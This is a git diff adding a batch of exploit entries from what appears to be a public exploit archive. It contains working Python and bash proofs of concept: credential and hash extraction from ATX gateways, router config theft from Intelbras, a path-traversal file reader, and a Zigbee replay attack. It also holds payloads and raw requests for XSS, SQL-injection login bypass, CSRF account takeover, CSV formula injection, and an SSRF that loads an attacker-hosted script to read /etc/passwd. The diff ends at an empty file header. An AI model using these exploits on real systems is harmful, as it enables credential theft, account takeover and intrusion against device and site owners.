diff --git a/exploits/hardware/webapps/49124.py b/exploits/hardware/webapps/49124.py
new file mode 100755
index 000000000..63f5e940a
--- /dev/null
+++ b/exploits/hardware/webapps/49124.py
@@ -0,0 +1,45 @@
+# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
+# Date: 2020-11-20
+# Exploit Author: Zagros Bingol
+# Vendor Homepage: http://www.atx.com
+# Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/
+# Version: 2.0 and earlier
+# Tested on: Debian 10 64bit
+
+-------------------------------------
+
+Endpoint:
+http://www.ip/domain.com/inc/user.ini
+
+--------------------------------------
+
+Proof-of-Concept:
+
+#!/usr/bin/python3
+#License: GNU General Public license v3.0
+#Author: Zagros Bingol(Zagrosbingol@outlook.com)
+
+
+import requests
+import re
+
+target = input("Target(ex:http://host): \n")
+port = input("Port: \n")
+
+
+def sploit(target, port):
+print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 -
+Credential Disclosure\n")
+r = requests.post(target + ":" + port + '/inc/user.ini')
+searching = re.findall(r"\[.{1,8}\]", str(r.text))
+print("Usernames:\n")
+print(", ".join(searching).replace("[", "").replace("]", ""))
+
+def hash():
+r = requests.post(target + '/inc/user.ini')
+searching = re.findall(r"([a-fA-F\d]{32})", str(r.text))
+print("Hashes:\n")
+print(", ".join(searching).replace("[", "").replace("]", ""))
+hash()
+
+sploit(target, port)
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49126.py b/exploits/hardware/webapps/49126.py
new file mode 100755
index 000000000..23bd77eb6
--- /dev/null
+++ b/exploits/hardware/webapps/49126.py
@@ -0,0 +1,37 @@
+# Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass
+# Date: 27/11/2020
+# Exploit Author: Kaio Amaral
+# Vendor Homepage: https://www.intelbras.com/pt-br/
+# Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301K_v1.1.2.zip
+# Version: firmware version 1.1.2
+# Tested on: kali, android
+
+# POC
+
+# 1. nc host port, ex: nc 10.0.0.1 80
+# 2. GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0
+
+# Python3
+
+import socket
+from time import sleep
+
+def exploit(host, port=80):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    pay = "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0\n\n".encode()
+    s.connect((host, port))
+    s.send(pay)
+    sleep(0.2)
+    data = s.recv(17576)
+    if len(data) > 1000:
+        print("[+] Success.")
+        return data.decode()
+    print("[-] Failed. ")
+    exit()
+
+def file(data):
+    with open("router.cfg", "w") as file:
+        file.write(data[233:])
+    print("[+] File Successfully Written.")
+
+file(exploit("10.0.0.1"))
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49186.txt b/exploits/hardware/webapps/49186.txt
new file mode 100644
index 000000000..651176bdb
--- /dev/null
+++ b/exploits/hardware/webapps/49186.txt
@@ -0,0 +1,69 @@
+# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
+# Date: 20.09.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://pro-bravia.sony.net
+# Version: 1.7.8
+
+Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion
+
+
+Vendor: Sony Electronics Inc.
+Product web page: https://pro-bravia.sony.net
+                  https://pro-bravia.sony.net/resources/software/bravia-signage/
+                  https://pro.sony/ue_US/products/display-software
+Affected version: <=1.7.8
+
+Summary: Sony's BRAVIA Signage is an application to deliver
+video and still images to Pro BRAVIAs and manage the information
+via a network. Features include management of displays, power
+schedule management, content playlists, scheduled delivery
+management, content interrupt, and more. This cost-effective
+digital signage management solution is ideal for presenting
+attractive, informative visual content in retail spaces and
+hotel reception areas, visitor attractions, educational and
+corporate environments.
+
+Desc: BRAVIA digital signage is vulnerable to a remote file
+inclusion (RFI) vulnerability by including arbitrary client-side
+dynamic scripts (JavaScript, VBScript, HTML) when adding content
+though the input URL material of type html. This allows hijacking
+the current session of the user, execute cross-site scripting code
+or changing the look of the page and content modification on current
+display.
+
+Tested on: Microsoft Windows Server 2012 R2
+           Ubuntu
+           NodeJS
+           Express
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5612
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php
+
+
+20.09.2020
+
+--
+
+
+Request:
+--------
+
+POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1
+Host: 192.168.1.20:8080
+Proxy-Connection: keep-alive
+Content-Length: 468
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Origin: http://192.168.1.20:8080
+Referer: http://192.168.1.20:8080/test.txt
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: io=RslVZVH6Dc8WsOn5AAAJ
+
+{"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49187.txt b/exploits/hardware/webapps/49187.txt
new file mode 100644
index 000000000..91cb0f96b
--- /dev/null
+++ b/exploits/hardware/webapps/49187.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
+# Date: 20.09.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://pro-bravia.sony.net
+# Version: 1.7.8
+
+Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure
+
+
+Vendor: Sony Electronics Inc.
+Product web page: https://pro-bravia.sony.net
+                  https://pro-bravia.sony.net/resources/software/bravia-signage/
+                  https://pro.sony/ue_US/products/display-software
+Affected version: <=1.7.8
+
+Summary: Sony's BRAVIA Signage is an application to deliver
+video and still images to Pro BRAVIAs and manage the information
+via a network. Features include management of displays, power
+schedule management, content playlists, scheduled delivery
+management, content interrupt, and more. This cost-effective
+digital signage management solution is ideal for presenting
+attractive, informative visual content in retail spaces and
+hotel reception areas, visitor attractions, educational and
+corporate environments.
+
+Desc: The application is vulnerable to sensitive information
+disclosure vulnerability. An unauthenticated attacker can
+visit several API endpoints and disclose information running
+on the device.
+
+Tested on: Microsoft Windows Server 2012 R2
+           Ubuntu
+           NodeJS
+           Express
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5610
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php
+
+
+20.09.2020
+
+--
+
+
+$ curl http://192.168.1.20:8080/api/system
+
+{"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"}
\ No newline at end of file
diff --git a/exploits/linux/remote/49176.txt b/exploits/linux/remote/49176.txt
new file mode 100644
index 000000000..850cee04d
--- /dev/null
+++ b/exploits/linux/remote/49176.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure
+# Date: 2003-07-28
+# Exploit Author: Andrea Intilangelo (acme olografix / paranoici)
+# Vendor Homepage: www.mitel.com
+# Version: mitel-cs018
+# Tested on: Windows, Linux
+
+There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this:
+
+Trying 192.168.1.2...
+Connected to 192.168.1.2.
+Escape character is '^]'. 
+Username: mitel-cs018
+Password: 
+ERROR: Invalid Username/Password pair 
+Username:
+Password: 
+Username: ^X^W^E^Q^W
+Password: 
+ERROR: Invalid Username/Password pair 
+Username: Password: 
+ERROR: Invalid Username/Password pair 
+# in this moment a foreign call arrive from outside
+Username: 155 OGIN 149        11:11:55                        D 2
+156 ICIN            11:12: 6                        D 4 0xxxXxxxxx
+157 XFIC 156        11:12: 6 151            0: 9:47 D 3
+158 ICIN            11:12: 6                        D 3 0xxxXxxxxx
+159 ANSW 146        11:12:11                0: 0: 9 D 4
+160 HDIN 146        11:12:21                        D 4
+162 HREC 146        11:12:27                0: 0: 6 D 4
+163 ABND ?          11:12:37                0: 0:37 D 3 0xxxXxxxxx
+164 ICIN            11:12:43                        D 3 0xxxXxxxxx
+165 EXIC 146        11:12:54                0: 0:47 D 4
+166 ANSW 146        11:13: 0                0: 0:16 D 3
+167 HDIN 146        11:13: 6                        D 3
+169 EXIC 146        11:13:13        156     0: 0:12 D 3
+171 EXOG 149        11:13:46                0: 1:59 D 2 0xxXxxxxx
+172 XFIC 156        11:16:53 146            0: 3:40 D 3 
+# where "0xxXxxxxx" are telephone numbers
+A derives table results is:
+SEQ CODE  EXT   ACC   TIME     RX     TX   DURATION LN    DIALLED DIGITS   COST
+No.       No.   COD HH:MM:SS  FROM    TO   HH:MM:SS No.
+___ _____ ____ ____ ________  ____   ____  ____________   ______________  _______
\ No newline at end of file
diff --git a/exploits/multiple/remote/49169.sh b/exploits/multiple/remote/49169.sh
new file mode 100755
index 000000000..eb685d53d
--- /dev/null
+++ b/exploits/multiple/remote/49169.sh
@@ -0,0 +1,95 @@
+# Exploit Title: Ksix Zigbee Devices - Playback Protection Bypass (PoC)
+# Date: 2020-11-15
+# Exploit Author: Alejandro Vazquez Vazquez
+# Vendor Homepage: https://www.ksixmobile.com/
+# Firmware Version: (Gateway Zigbee Module - v1.0.3, Gateway Main Module - v1.1.2, Door Sensor - v1.0.7, PIR Motion Sensor - v1.0.12)
+# Tested on: Kali Linux 2020.3
+
+# The coordinator of the Zigbee network (Zigbee gateway) does not correctly check the sequence number of the packets that are sent to it, which allows forging messages from an end device to the coordinator (example: turn on a light bulb, open a door, ...) by injecting a very large value in the "sequence number" field.
+# To exploit this vulnerability
+#	1. Capture Zigbee traffic with a sniffer (Api-Mote) and save it in .pcap format
+#	2. Open the file with Wireshark and locate the packet you want to forward (turn on a light bulb, open a door, ...)
+#	3. Copy that packet as "hex dump" and save it to a .txt file
+#	4. Modify the "sequence number" field to a high value such as 250
+#	5. Convert the txt file to .pcap again
+#	6. Forward the packet to the network, using a tool such as Killerbee
+
+#!/bin/bash
+
+function usage(){
+	echo -e "\nUsage: $0 [ZigbeeChannel] [SecuenceNumber] [HexDumpFile] [ShortSource] [ExtendedSource] [ShortDestination] [ShortPanId] [FCS]"
+	echo -e "Example: $0 11 250 Open_Door_Alert_Hex_Dump 0x0001 11:ff:11:ff:11:ff:11:ff 0x0000 0x3333 0x0000 \n"
+	echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n"
+}
+
+function message(){
+	echo -e "\nProof of Concept"
+	echo -e "There is an incorrect check of the \"sequence number\" field on Ksix Zigbee devices\n"
+	echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n"
+}
+
+function poc_playback(){
+	# Variables
+	ZIGBEE_CHANNEL=$1
+	SECUENCE_NUMBER=$2
+	HEX_DUMP_FILE=$3
+	SHORT_SOURCE=$4
+	EXTENDED_SOURCE=$5
+	SHORT_DESTINATION=$6
+	SHORT_PAN_DESTINATION=$7
+	FRAME_CHECK_SECUENCE=$8
+	declare -a first_line_array
+	declare -a second_line_array
+	declare -a last_line_array
+	# Change packet fields
+	while IFS= read -r line
+	do
+		if [[ "$line" == "0000"* ]]; then
+			IFS=' ' read -ra first_line_array <<< "$line"
+			first_line_array[0]+="  "
+			first_line_array[3]=$( printf "%x" $SECUENCE_NUMBER )
+			first_line_array[4]=${SHORT_PAN_DESTINATION:4:2}
+			first_line_array[5]=${SHORT_PAN_DESTINATION:2:2}
+			first_line_array[6]=${SHORT_DESTINATION:4:2}; first_line_array[11]=${SHORT_DESTINATION:4:2}
+			first_line_array[7]=${SHORT_DESTINATION:2:2}; first_line_array[12]=${SHORT_DESTINATION:2:2}
+			first_line_array[8]=${SHORT_SOURCE:4:2}; first_line_array[13]=${SHORT_SOURCE:4:2}
+			first_line_array[9]=${SHORT_SOURCE:2:2}; first_line_array[14]=${SHORT_SOURCE:2:2}
+			echo "${first_line_array[@]}" > Check_Secuence_Number_Incorrectly_HEX_Dump
+		elif [[ "$line" == "0010"* ]]; then
+			IFS=' ' read -ra second_line_array <<< "$line"
+			second_line_array[0]+="  "
+			second_line_array[7]=${EXTENDED_SOURCE:21:2}; second_line_array[8]=${EXTENDED_SOURCE:18:2}
+			second_line_array[9]=${EXTENDED_SOURCE:15:2}; second_line_array[10]=${EXTENDED_SOURCE:12:2}
+			second_line_array[11]=${EXTENDED_SOURCE:9:2}; second_line_array[12]=${EXTENDED_SOURCE:6:2}
+			second_line_array[13]=${EXTENDED_SOURCE:3:2}; second_line_array[14]=${EXTENDED_SOURCE:0:2}
+			echo "${second_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump
+		elif [[ "$line" == "0030"* ]]; then
+			IFS=' ' read -ra last_line_array <<< "$line"
+			last_line_array[0]+="  "
+			last_line_array[11]=${FRAME_CHECK_SECUENCE:4:2}
+			last_line_array[12]=${FRAME_CHECK_SECUENCE:2:2}
+			echo "${last_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump
+		else
+			echo "$line" >> Check_Secuence_Number_Incorrectly_HEX_Dump
+		fi
+	done < $HEX_DUMP_FILE
+	# Hex Dump file to pcap
+	text2pcap Check_Secuence_Number_Incorrectly_HEX_Dump Check_Secuence_Number_Incorrectly.pcap
+	# Playback
+	zbreplay --channel $ZIGBEE_CHANNEL --pcapfile Check_Secuence_Number_Incorrectly.pcap && echo -e "\nPacket sent to the network. Poc Completed.\n"
+}
+
+function main(){
+	if [ $# -lt 8 ]; then
+		echo -e "\n\t Missing arguments"
+		usage
+		exit
+	else
+		message
+		poc_playback $1 $2 $3 $4 $5 $6 $7 $8
+	fi
+}
+
+main $1 $2 $3 $4 $5 $6 $7 $8
+
+#NOTE: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message "Door open".
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49133.py b/exploits/multiple/webapps/49133.py
new file mode 100755
index 000000000..7954245fa
--- /dev/null
+++ b/exploits/multiple/webapps/49133.py
@@ -0,0 +1,29 @@
+# Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion
+# Date: 02/09/20
+# Exploit Author: Bryan Rodriguez Martin AKA tr3mb0
+# Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/
+# Version: 3.7.1.2
+# Tested on: Windows
+# FIX: The recommendation from the vendor is to update to the last version.
+
+import requests
+import urllib.parse
+import colorama
+
+from colorama import Fore, Style
+
+ENDPOINT = "http://10.4.8.11:8081/"
+
+while True:
+    cmd = input(Fore.RED + "[*] FILE >> ")
+    print(Style.RESET_ALL)
+
+    #cmd = urllib.parse.quote(cmd)
+    ENDPOINT2 = ENDPOINT + "..%2F..%2F"  + cmd
+
+    print("[*] Target >> " + ENDPOINT2)
+    print(" ")
+    r = requests.get(url = ENDPOINT2)
+
+    extract = r.text
+    print(extract)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49145.txt b/exploits/multiple/webapps/49145.txt
new file mode 100644
index 000000000..b5ca3ffd3
--- /dev/null
+++ b/exploits/multiple/webapps/49145.txt
@@ -0,0 +1,21 @@
+#Exploit Title: Tendenci 12.3.1 - CSV/ Formula Injection
+#Date: 2020-10-29
+#Exploit Author: Mufaddal Masalawala
+#Vendor Homepage: https://www.tendenci.com/
+#Software Link: https://github.com/tendenci/tendenci
+#Version: 12.3.1
+#Payload:  =10+20+cmd|' /C calc'!A0
+#Tested on: Kali Linux 2020.3
+#Proof Of Concept:
+CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
+Contact Us feature in Tendenci v12.3.1 via message field that is mistreated
+while exporting to a CSV file.
+To exploit this vulnerability:
+
+   1. Go to contact us page and enter the payload "=10+20+cmd|' /C
+   calc'!A0" in the message field and submit the form
+   2. Login to the application and go to Forms section and export the
+   contact us form entries
+   3. Click on Export and save the CSV file downloaded
+   4. Open the CSV file, allow all popups and our payload is executed
+   (calculator is opened).
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49146.txt b/exploits/multiple/webapps/49146.txt
new file mode 100644
index 000000000..87be51248
--- /dev/null
+++ b/exploits/multiple/webapps/49146.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Expense Management System - 'description' Stored Cross Site Scripting
+# Date: 02/12/2020
+# Exploit Author: Nikhil Kumar
+# Vendor Homepage: http://egavilanmedia.com/
+# Software Link: http://egavilanmedia.com/expense-management-system/
+# Tested On: Ubuntu
+
+Vunerable Parameter: "description="
+
+Steps to Reproduce:
+
+1. Open the index.php page using following url 
+
+http://localhost/Expense-Management-System/index.php
+
+click on Add Expense
+
+2. Put a payload on "description=" parameter
+
+Payload :- test"><script>alert("XSS")</script>
+
+Malicious Request::
+
+POST /Expense-Management-System/expense_action.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 140
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/Expense-Management-System/
+Cookie: PHPSESSID=45f122ec98900409467ac74f6113ff4a
+
+description=test%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&amount=1234&date=2020%2F11%2F17&expense_id=&action=Add
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49148.txt b/exploits/multiple/webapps/49148.txt
new file mode 100644
index 000000000..82ee619cb
--- /dev/null
+++ b/exploits/multiple/webapps/49148.txt
@@ -0,0 +1,33 @@
+# Exploit Title: ILIAS Learning Management System 4.3 - SSRF 
+# Date: 10-08-2020
+# Exploit Author: Dot/kx1z0
+# Vendor Homepage: https://www.ilias.de/
+# Software Link: https://github.com/ILIAS-eLearning/ILIAS/tree/release_4-3
+# Version: 4.3-5.1
+# Tested on: Linux
+# Description
+We can create portfolios, export them to PDF and download them.
+The issue is that there is an HTML Injection, and if we inject HTML
+into the portfolio, when it is exported to PDF, it will be rendered.
+So we can take advantage that it is running under the wrapper file://
+to inject an XMLHttpRequest requesting the local file we want, that
+when downloading the PDF, we can see the content of that file
+
+# Exploit
+We cannot inject the XMLHttpRequest directly into the content of the
+portfolio, as there is something blocking it. So we will have to host
+a script in our own server and invoke it from the portfolio
+
+We insert this in the portfolio:
+<script src=host.com/test.js> </script>
+
+Script in our server:
+x=new XMLHttpRequest;
+x.onload=function(){
+document.write(this.responseText)
+};
+x.open("GET","file:///etc/passwd");
+x.send();
+
+So, finally, we will only have to download the PDF and there, will be
+the content of the file we have requested.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49150.txt b/exploits/multiple/webapps/49150.txt
new file mode 100644
index 000000000..82ec8de77
--- /dev/null
+++ b/exploits/multiple/webapps/49150.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Under Construction Page with CPanel 1.0 - SQL injection
+# Date: 17-11-2020
+# Exploit Author: Mayur Parmar(th3cyb3rc0p)
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link : http://egavilanmedia.com/under-construction-page-with-cpanel/
+# Version: 1.0
+# Tested on: PopOS
+
+SQL Injection:
+SQL injection is a web security vulnerability that allows an attacker
+to alter the SQL queries made to the database. This can be used to
+retrieve some sensitive information, like database structure, tables,
+columns, and their underlying data.
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection queries.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/Under%20Construction/admin/login.php
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: admin' or '1'='1
+
+3. Server accepted our payload and we bypassed cpanel without any
+credentials
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49151.txt b/exploits/multiple/webapps/49151.txt
new file mode 100644
index 000000000..2502bf809
--- /dev/null
+++ b/exploits/multiple/webapps/49151.txt
@@ -0,0 +1,65 @@
+# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF
+# Date: 01-12-2020
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
+# Version: 1.0
+# Tested on Windows 10
+
+CSRF ATTACK:
+Cross-site request forgery (also known as CSRF) is a web security
+vulnerability that allows an attacker to induce users to perform actions
+that they do not intend to perform. It allows an attacker to partly
+circumvent the same-origin policy, which is designed to prevent different
+websites from interfering with each other.
+
+Attack Vector:
+An attacker can update any user's account. (Note: FULL NAME field is also
+vulnerable to stored XSS & attacker can steal the authenticated Session os
+the user)
+
+Steps to reproduce:
+1. Open user login page using the following URL:
+->
+http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/login.html
+
+2. Now login with the "attacker" user account & navigate to the edit
+profile tab. Click on the "Update" button and intercept the request in web
+proxy tool called "Burpusite"
+
+3. Generate the CSRF POC from the burp tool. Copy the URL or Copy the below
+code.
+
+<html>
+<!-- CSRF PoC - generated by Burp Suite Professional -->
+<body>
+<script>history.pushState('', '', '/')</script>
+<form action="
+http://localhost/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile_action.php"
+method="POST">
+<input type="hidden" name="fullname" value="Attacker" />
+<input type="hidden" name="username" value="hunterr" />
+<input type="hidden" name="email"
+value="noooobhunter&#64;gmail&#46;com" />
+<input type="hidden" name="gender" value="Male" />
+<input type="hidden" name="action" value="update&#95;user" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+4. Now, login with the "Victim/Normal user" account. (Let that user is
+currently authenticated in the browser).
+
+5. Paste the URL in the browser, which is copied in step 3. OR submit the
+CSRF POC code, which is shown in step 3.
+
+6. We receive a "Status: Success", which indicates that the CSRF attack is
+successfully done & the Attacker can takeover the user account via Stored
+XSS (Steal the authenticated Cookies of the user from the "FULL NAME"
+parameter)
+
+IMPACT:
+An attacker can takeover any user account. (Note: FULL NAME field is also
+vulnerable to stored XSS & attacker can steal the authenticated Session os
+the user)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49152.txt b/exploits/multiple/webapps/49152.txt
new file mode 100644
index 000000000..8095513a7
--- /dev/null
+++ b/exploits/multiple/webapps/49152.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Student Result Management System 1.0 - Authentication Bypass SQL Injection
+# Google Dork: N/A
+# Date: 11/16/2020
+# Exploit Author: Ritesh Gohil
+# Vendor Homepage: https://projectnotes.org/it-projects/student-result-management-system-in-php-with-source-code/
+# Software Link: https://projectnotes.org/download/studentms-zip/
+# Version: 1.0
+# Tested on: Win10 x64, Kali Linux x64
+# CVE : N/A
+######## Description
+#################################################################
+#
+#
+# An SQL injection vulnerability discovered in PHP Student Result Management System #
+#
+#
+# Admin Login Portal is vulnerable to SQL Injection
+#
+#
+#
+# The vulnerability could allow for the improper neutralization of special elements #
+# in SQL commands and may lead to the product being vulnerable to SQL injection. #
+#
+#
+######################################################################################
+
+Kindly Follow Below Steps:
+1. Visit the main page of the Student Result Management System.
+2. You will get an Admin Login Page.
+3. Payload which you can use in Email and password field:
+*AND 1=0 AND '%'='
+*4. You will get Admin Access of the Student Result Management System.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49153.txt b/exploits/multiple/webapps/49153.txt
new file mode 100644
index 000000000..6cbb5cf1f
--- /dev/null
+++ b/exploits/multiple/webapps/49153.txt
@@ -0,0 +1,13 @@
+# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting
+# Exploit Author: Soushikta Chowdhury
+# Vendor Homepage:  http://egavilanmedia.com
+# Software Link:  http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel/
+# Version: 1.0
+# Tested on: Windows 10
+# Contact: https://www.linkedin.com/in/soushikta-chowdhury/
+
+Vulnerable Parameters: Full Name
+Steps for reproduce:
+1. Go to registration page
+2. fill in the details & put <script>alert("soushikta")</script> payload in Full name.
+3. Now goto Admin Panel. After entering go to Manage Users and go to the last page to check the newly added user. We could see that our payload gets executed.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49159.txt b/exploits/multiple/webapps/49159.txt
new file mode 100644
index 000000000..b6d0d9438
--- /dev/null
+++ b/exploits/multiple/webapps/49159.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting
+# Date: 27-11-2020
+# Exploit Author: Sagar Banwa
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://projectworlds.in/free-projects/php-projects/online-voting-system-project-in-php-2/
+# Tested on: Windows 10/Kali Linux
+
+Steps-To-Reproduce:
+
+1. Go to register 
+2. Add the payload in Username : <script>alert(1)</script>
+3. And complete the register 
+4. Login to the account 
+
+POST /vote/reg_action.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 593
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/vote/register.php
+Cookie: PHPSESSID=1sqkq0u1m2j47906htd45opcep
+Upgrade-Insecure-Requests: 1
+
+firstname=user1&lastname=user2&username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=testtest&g-recaptcha-response=03AGdBq24TB5LilE4y9YCZx4I_XrKLBs2ftYrVEJ70_vhpDG-FXCKhzfB-EmAD-NnhKRSZ8_A88_ZNB4nXnwMBs8cU1Qgrqzs8Yme0Bmral8WRK1umGikJeDzliuigIKgZ6Q2Me9zGS-ecZyrujgF4tKSlMs3K_KNgVhEhlAsslrfBe7jQg40aG3PdMCXTTOst4Lt91vswl1G_dmYjrLEh7AfLJS7XYgXrEt4Pfau_mJ3KzE_hf-MxbpTI9_NkCLanUiW8-VI1t3uopUbSE9xH53X1cUExoe_dGpwnkygZw_4yEDp-iBYA73wql5ow1W43OIn5pmSBz_Sdv1VbfAqbFMEIXXJx4o5D_TLiVKLDQCj2Vy-fRmohlpYwV76NR5Iu2D693FKCs3KODRNSaitpOevSfcYh3h05vCGuPSO1fCu4c3v1daiIdFKPwDvfKS_Lm8jgoFK4kfnZ&submit=Next
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49160.txt b/exploits/multiple/webapps/49160.txt
new file mode 100644
index 000000000..1222993fd
--- /dev/null
+++ b/exploits/multiple/webapps/49160.txt
@@ -0,0 +1,29 @@
+# Exploit Title: NewsLister - Authenticated Persistent Cross-Site Scripting
+# Date: 2020-11-27
+# Exploit Author: Emre Aslan
+# Vendor Homepage: https://www.netartmedia.net/newslister.html
+# Tested on: Windows & XAMPP
+
+==> PoC <==
+
+1- Login to admin panel.
+2- Enter the payload to title value.
+3- View the news. XSS will be execute.
+
+==> HTTP Request <==
+
+GET /admin/index.php?page=add HTTP/1.1
+Host: 127.0.0.1:8080
+Connection: keep-alive
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: host/admin/index.php?page=home
+Accept-Encoding: gzip, deflate, br
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: AuthUser=administrator~da1907216877e31462c14b35db67de32~1606484275; PHPSESSID=nn5gq66nla4lfs47fq9eoctvuf
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49161.txt b/exploits/multiple/webapps/49161.txt
